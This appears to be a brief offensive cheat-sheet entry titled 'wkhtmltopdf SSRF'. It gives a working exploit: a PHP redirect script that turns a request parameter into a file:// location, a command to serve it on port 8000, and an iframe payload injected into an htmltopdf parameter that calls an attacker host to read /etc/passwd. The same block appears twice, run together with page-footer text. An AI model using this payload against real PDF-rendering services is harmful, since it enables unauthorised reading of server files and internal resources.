wkhtmltopdf SSRF
Exploitation
<?php header('location:file://'.$_REQUEST['x']); ?>php -S 0.0.0.0:8000/htmltopdf?item=<iframe src=http://10.0.0.1:8000/test.php?x=/etc/passwd width=1000px height=1000px></iframe>Last updated
<?php header('location:file://'.$_REQUEST['x']); ?>php -S 0.0.0.0:8000/htmltopdf?item=<iframe src=http://10.0.0.1:8000/test.php?x=/etc/passwd width=1000px height=1000px></iframe>Last updated